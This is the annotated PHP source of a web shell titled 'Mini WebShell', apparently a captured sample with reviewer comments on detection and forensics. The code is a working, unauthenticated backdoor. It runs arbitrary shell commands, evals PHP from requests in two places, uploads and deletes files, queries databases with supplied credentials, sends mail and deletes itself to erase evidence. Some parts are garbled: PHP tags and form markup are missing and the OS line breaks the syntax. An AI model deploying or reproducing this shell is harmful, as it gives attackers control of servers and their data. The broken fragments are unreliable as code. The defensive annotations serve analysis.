// Enable full error reporting
// NOTE(review): display_errors / display_startup_errors send PHP warnings and
// notices into the HTTP response, so file paths and internals reach any client.
ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(E_ALL);

// A session is started, but nothing in the visible source reads or writes
// $_SESSION: no handler below is gated by a login or token check.
session_start();

// Routing
// Allow-list of handler names. ?page= selects one; a missing or unknown value
// falls back to 'sysinfo'. For triage, this list is a compact summary of the
// file's capabilities: command execution (cmd), PHP evaluation (eval, calc),
// file write (upload), database access (sql) and self-deletion (selfremove).
$pages = array(
'sysinfo','whois','traceroute','files','search','upload',
'cmd','eval','sql','mailers','calc','tools','proc',
'selfremove','logout'
);
// in_array() is called without its strict flag, so the membership test is a loose (==) comparison.
$page = (isset($_GET['page']) && in_array($_GET['page'],$pages))
? $_GET['page']
: 'sysinfo';

// Helpers
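/**
 * Format a byte count as a human-readable size string.
 *
 * Divides by 1024 until the value is below one unit step or the largest
 * unit (TB) is reached, then rounds to two decimals.
 *
 * @param int|float $bytes Byte count to format.
 * @return string Value and unit separated by a space, e.g. "1.5 KB".
 */
function humanSize($bytes) {
    $units = array('B','KB','MB','GB','TB');
    $last = count($units) - 1;
    $i = 0;
    // >= rather than >: an exact multiple such as 1024 is promoted to the
    // next unit ("1 KB") instead of being printed as "1024 B".
    while ($bytes >= 1024 && $i < $last) {
        $bytes /= 1024;
        $i++;
    }
    return round($bytes,2).' '.$units[$i];
}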
/**
 * HTML-escape a value before it is written into the page.
 *
 * Converts &, <, > and both quote characters to entities, treating the
 * input as UTF-8.
 *
 * @param string $s Text to escape.
 * @return string Escaped text.
 */
function esc($s) {
    $flags = ENT_QUOTES;
    $charset = 'UTF-8';
    return htmlspecialchars($s, $flags, $charset);
}
/**
 * Report whether PHP is running on a Windows host.
 *
 * Compares the first three characters of PHP_OS with "WIN", ignoring case.
 *
 * @return bool True when PHP_OS starts with "WIN".
 */
function isWindows() {
    $prefixLength = 3;
    return strncasecmp(PHP_OS, 'WIN', $prefixLength) === 0;
}

<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
Mini WebShell<title>Mini WebShell</title>
<style>
body{margin:0;font-family:Arial,sans-serif;background:#f4f4f4;color:#333;}
.navbar{background:#444;padding:5px;display:flex;flex-wrap:wrap;}
.navbar a{color:#ddd;margin:2px 5px;padding:5px 8px;text-decoration:none;border-radius:3px;}
.navbar a.active,.navbar a:hover{background:#666;color:#fff;}
.content{padding:15px;}
table{width:100%;border-collapse:collapse;margin:10px 0;}
th,td{padding:8px;border-bottom:1px solid #ccc;text-align:left;}
form,ul{margin:10px 0;}
input,textarea,select,button{padding:5px;margin:3px 0;max-width:400px;width:100%;}
pre{background:#222;color:#0f0;padding:10px;overflow:auto;}
.msg{padding:10px;background:#eef;border:1px solid #ccd;margin:10px 0;}
</style>


<div class="navbar">
foreach($pages as $p):
<a href="?page= echo $p" class=" echo $p===$page?'active':''">
echo strtoupper($p)
</a>
endforeach
</div>
<div class="content">

switch($page):
// SYSTEM INFO
// Default view. Collects host details: OS string, owning account, disk totals
// for the script's directory, server software, PHP version, and the PHP
// restrictions in force (safe_mode, open_basedir) plus cURL availability.
case 'sysinfo':
$info = array(
// NOTE(review): the 'OS' value below is a bare uname-style string, not a PHP
// expression, and its '#' starts a PHP comment. Presumably the original held a
// function call here that was replaced in capture; confirm against the sample.
'OS' => Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64,
'User' => get_current_user(),
'Disk Total' => humanSize(disk_total_space(__DIR__)),
'Disk Free' => humanSize(disk_free_space(__DIR__)),
'Server' => $_SERVER['SERVER_SOFTWARE'],
'PHP Version' => phpversion(),
'Safe Mode' => ini_get('safe_mode')?'ON':'OFF',
'Open Basedir' => ini_get('open_basedir')?:'NONE',
'cURL' => function_exists('curl_version')?'YES':'NO',
);
echo '';
foreach($info as $k=>$v){
echo '<th>'.esc($k).'</th>';
}
// NOTE(review): $v is echoed once, after the loop, so as captured only the last
// value is printed. The empty and newline-only literals suggest table markup
// was lost in extraction.
echo '
'.esc($v).'
';
break;

// WHOIS
// Runs the system `whois` binary on POST 'host'. The value is wrapped with
// escapeshellarg(), so it is passed as a single argument. The command output
// is written into <pre> without esc().
// Detection: the web-server worker spawning `whois` as a child process.
case 'whois':
if(!empty($_POST['host'])){
echo '<pre>'.shell_exec('whois '.escapeshellarg($_POST['host'])).'</pre>';
}
// NOTE(review): the literal holds only the input and button; the enclosing
// <form> markup appears to have been lost in capture.
echo '
<input name="host" placeholder="domain or IP"><button>WHOIS</button>
';
break;

// TRACEROUTE
// Picks `tracert` on Windows and `traceroute` elsewhere, then runs it on
// POST 'host' (single argument via escapeshellarg()). Output is echoed
// without esc().
// Detection: outbound probe traffic and a traceroute/tracert child process
// owned by the web-server account.
case 'traceroute':
$bin = isWindows()?'tracert':'traceroute';
if(!empty($_POST['host'])){
echo '<pre>'.shell_exec($bin.' '.escapeshellarg($_POST['host'])).'</pre>';
}
echo '
<input name="host" placeholder="domain or IP"><button>Traceroute</button>
';
break;

// FILE MANAGER
// Lists the current working directory and offers per-file download and delete.
// Both actions are driven by GET parameters, so they appear in access logs as
// ?page=files&action=...&file=... requests.
case 'files':
if(!empty($_GET['action']) && !empty($_GET['file'])){
// basename() drops any directory part, so the relative path used below
// resolves inside the current working directory.
$f = basename($_GET['file']);
if($_GET['action']==='delete'){
// The return value of unlink() is not checked; "Deleted" is printed either way.
unlink($f);
echo '<div class="msg">Deleted '.esc($f).'</div>';
}
if($_GET['action']==='download'){
// $f is placed in the header value as-is; no Content-Type is set.
header('Content-Disposition: attachment; filename="'.$f.'"');
readfile($f); exit;
}
}
$list = scandir('.');
echo '<ul>';
foreach($list as $f){
if(in_array($f,array('.','..'))) continue;
// Names are HTML-escaped for display and URL-encoded inside the links.
echo '<li>'.esc($f)
.' [<a href="?page=files&action=download&file='.urlencode($f).'">DL</a>]'
.' [<a href="?page=files&action=delete&file='.urlencode($f).'" onclick="return confirm(\'Delete?\')">DEL</a>]'
.'</li>';
}
echo '</ul>';
break;

// SEARCH
// Recursive content search: runs `grep -Rn <term> .` from the current working
// directory with POST 'q' as a single escaped argument. Matching lines are
// echoed without esc().
// Detection: a `grep -Rn` child process under the web-server account.
case 'search':
if(!empty($_POST['q'])){
echo '<pre>'.shell_exec('grep -Rn '.escapeshellarg($_POST['q']).' .').'</pre>';
}
echo '
<input name="q" placeholder="search term"><button>SEARCH</button>
';
break;

// UPLOAD
// Writes the uploaded file 'up' into the current working directory under the
// client-supplied name (directory part removed by basename()). No check on
// extension, type or size is visible here.
// Detection / mitigation: file-integrity monitoring on the web root, and a
// web-server account without write permission to directories it serves from.
case 'upload':
if(!empty($_FILES['up'])){
$ok = move_uploaded_file($_FILES['up']['tmp_name'],basename($_FILES['up']['name']));
echo '<div class="msg">Upload '.($ok?'OK':'Failed').'</div>';
}
// NOTE(review): only the button survives in this literal; the file input and
// <form> markup appear to have been lost in capture.
echo '
<button>UPLOAD</button>
';
break;

// COMMAND SHELL
// Hands the whole POST 'cmd' string to shell_exec() with stderr merged into
// stdout (2>&1). escapeshellcmd() escapes shell metacharacters but does not
// restrict which program runs. Output is HTML-escaped before display.
// Detection: a shell started by the web-server worker. Mitigation: listing
// shell_exec (and related functions) in php.ini disable_functions.
case 'cmd':
if(!empty($_POST['cmd'])){
$out = shell_exec(escapeshellcmd($_POST['cmd']).' 2>&1');
echo '<pre>'.esc($out).'</pre>';
}
echo '
<input name="cmd" placeholder="command"><button>RUN</button>
';
break;

// EVAL
// Passes POST 'code' straight to eval(): request-supplied PHP runs inside the
// web-server process, and whatever it prints lands between the <pre> tags.
// eval is a language construct, not a function, so disable_functions does not
// cover it. Static scanning for eval() on request superglobals flags this line.
case 'eval':
if(!empty($_POST['code'])){
echo '<pre>'; eval($_POST['code']); echo '</pre>';
}
echo '
<textarea name="code" rows="6" placeholder="PHP code..."></textarea><button>EXEC</button>
';
break;

// SQL
// Generic MySQL client: host, user, password, database and the query text all
// come from the POST body, and the query is executed verbatim.
// Detection: the web-server worker opening database connections to hosts or
// with accounts the application itself does not use.
case 'sql':
if(!empty($_POST['host'])){
// Only 'host' is checked for presence; the other fields are read unconditionally.
$h=$_POST['host']; $u=$_POST['user']; $p=$_POST['pass']; $db=$_POST['db']; $q=$_POST['query'];
$m=new mysqli($h,$u,$p,$db);
if($m->connect_error){
echo '<div class="msg">Connect Error '.esc($m->connect_error).'</div>';
} else {
if($res=$m->query($q)){
// query() returns true for statements without a result set.
if($res===true){
echo '<div class="msg">Query OK</div>';
} else {
// Result set: column names as headers, then one pass over the rows.
// Cell values go through esc(). The empty literals suggest row and
// cell markup was lost in capture.
echo '<table border=1 cellpadding=5>';
while($col=$res->fetch_field()){
echo '<th>'.esc($col->name).'</th>';
}
echo '';
while($row=$res->fetch_assoc()){
echo '';
foreach($row as $v) echo ''.esc($v).'';
echo '';
}
echo '';
}
} else {
echo '<div class="msg">Error '.esc($m->error).'</div>';
}
$m->close();
}
}
// Connection form; the host field is pre-filled with "localhost".
echo '
'
.'<input name="host" placeholder="DB Host" value="localhost">'
.'<input name="user" placeholder="User">'
.'<input name="pass" placeholder="Password" type="password">'
.'<input name="db" placeholder="Database">'
.'<textarea name="query" rows="4" placeholder="SQL query..."></textarea>'
.'<button>EXECUTE</button>
';
break;

// MAILERS
// Sends one message through PHP mail() to the POST 'to' address, with the
// fixed subject 'Test' and body 'This is a test'. The recipient value is not
// validated before it reaches mail().
// Detection: mail submitted by the web-server account, visible in MTA logs.
case 'mailers':
if(!empty($_POST['to'])){
$ok=mail($_POST['to'],'Test','This is a test');
echo '<div class="msg">Mail '.($ok?'sent':'failed').'</div>';
}
echo '
<input name="to" placeholder="recipient@example.com"><button>SEND</button>
';
break;

// CALC
// Despite the name, this evaluates POST 'expr' as PHP: the value is wrapped in
// 'return ...;' and passed to eval(), with @ suppressing diagnostics. It is a
// second request-driven eval() path alongside the 'eval' page and matches the
// same static-analysis rule.
case 'calc':
if(!empty($_POST['expr'])){
$r = @eval('return '. $_POST['expr'] . ';');
echo '<div class="msg">Result: '.esc($r).'</div>';
}
echo '
<input name="expr" placeholder="2+2*3"><button>CALC</button>
';
break;

// TOOLS (PING)
// Sends four echo requests to POST 'host' (-n 4 on Windows, -c 4 elsewhere);
// the host is passed as a single escaped argument. Output is echoed without
// esc().
// Detection: ICMP originating from the web server and a `ping` child process
// under the web-server account.
case 'tools':
if(!empty($_POST['host'])){
$c = isWindows() ? 'ping -n 4':'ping -c 4';
echo '<pre>'.shell_exec($c.' '.escapeshellarg($_POST['host'])).'</pre>';
}
echo '
<input name="host" placeholder="host/IP"><button>PING</button>
';
break;

// PROCESS LIST
// Runs a fixed command (`tasklist` on Windows, `ps aux` elsewhere) and echoes
// the listing without esc(). No request input reaches the command line.
case 'proc':
$cmd = isWindows()?'tasklist':'ps aux';
echo '<pre>'.shell_exec($cmd).'</pre>';
break;

// SELF REMOVE
// Deletes this script from disk when POST 'confirm' is non-empty, then ends the
// request with the body "Removed".
// Forensics: after this runs the file is no longer in the web root, so evidence
// has to come from access logs (a POST to ?page=selfremove), backups or
// snapshots, and file-integrity monitoring history.
case 'selfremove':
if(!empty($_POST['confirm'])){
unlink(__FILE__); exit('Removed');
}
// NOTE(review): the empty literal and missing 'confirm' field suggest form
// markup was lost in capture.
echo '
'
.''
.'<button>Self Remove</button>
';
break;

// LOGOUT
// Destroys the session and redirects to the default page. Nothing in the
// visible source stores a login state in the session, so this only discards
// the session itself.
case 'logout':
session_destroy();
header('Location:?page=sysinfo');
exit;
endswitch;

</div>